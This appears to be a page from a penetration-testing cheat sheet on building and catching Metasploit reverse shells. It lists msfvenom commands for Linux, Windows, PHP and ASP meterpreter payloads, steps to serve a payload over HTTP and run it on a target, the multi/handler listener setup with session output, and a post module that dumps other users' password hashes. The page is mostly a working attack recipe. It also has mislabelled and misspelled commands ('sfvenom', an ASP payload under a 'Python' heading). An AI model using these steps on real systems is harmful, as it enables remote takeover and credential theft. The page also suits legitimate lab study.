Reverse shell

Generate executable

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf

Windows

sfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php

Python

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp

Transfer to target machines

Python

server: python3 -m http.server 9000
target : http://<ip_server>:9000/rev_shell.elf

On the target machines

Execute the downloaded file

chmod +x rev_shell.elf
./rev_shell.elf

Get a meterpreter session

 use exploit/multi/handler 
 set payload linux/x86/meterpreter/reverse_tcp
 set LHOST <ip_server>
 set LPORT <port_defined_msfvenom_command>
 run

The payload need to be same as used in generation of reverse shell executable (here linux/x86/meterpreter/reverse_tcp)

[*] Started reverse TCP handler on 10.10.192.190:6666 
[*] Sending stage (1017704 bytes) to 10.10.64.31
[*] Meterpreter session 1 opened (10.10.192.190:6666 -> 10.10.64.31:51156) at 2024-05-11 11:18:02 +0100

meterpreter >

Bonus

Exploitation module to dump hashes of other users on the system

post/linux/gather/hashdump

meterpreter > run post/linux/gather/hashdump

PreviousMetasploit Nextsmb_login

Last updated 1 year ago